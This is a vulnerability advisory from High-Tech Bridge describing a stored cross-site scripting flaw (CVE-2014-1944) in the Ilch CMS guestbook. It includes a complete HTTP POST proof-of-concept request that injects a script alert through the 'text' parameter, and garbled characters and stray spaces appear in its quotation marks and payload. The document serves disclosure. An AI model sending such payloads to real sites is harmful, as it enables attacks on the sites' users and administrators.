High-Tech Bridge Security Research Lab discovered vulnerability in Ilch CMS, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users and administrators of vulnerable application.
- Cross-Site Scripting (XSS) in Ilch CMS: CVE-2014-1944
The vulnerability exists due to insufficient sanitisation of user-supplied data in βtextβ HTTP POST parameter passed to β/index.php/guestbook/index/newentryβ URL. A remote unauthenticated user can send a specially crafted HTTP POST request, which allows to permanently inject and execute arbitrary HTML and script code in userβs browser in context of the vulnerable website when the victim visits the βhttp://[host]/index.php/guestbook/index/indexβ URL.
The exploitation example below uses the JavaScript βalert()β function to display βimmuniwebβ word:
POST /index.php/guestbook/index/newentry HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
ilch_token=5a528778359d4756b9b8803b48fba18b&name=name&email=email%40e mail.com&homepage=http%3A%2F%2Fsite.com&text=<script>alert(βimmuniwwebβ);</s cript>&saveEntry=Submit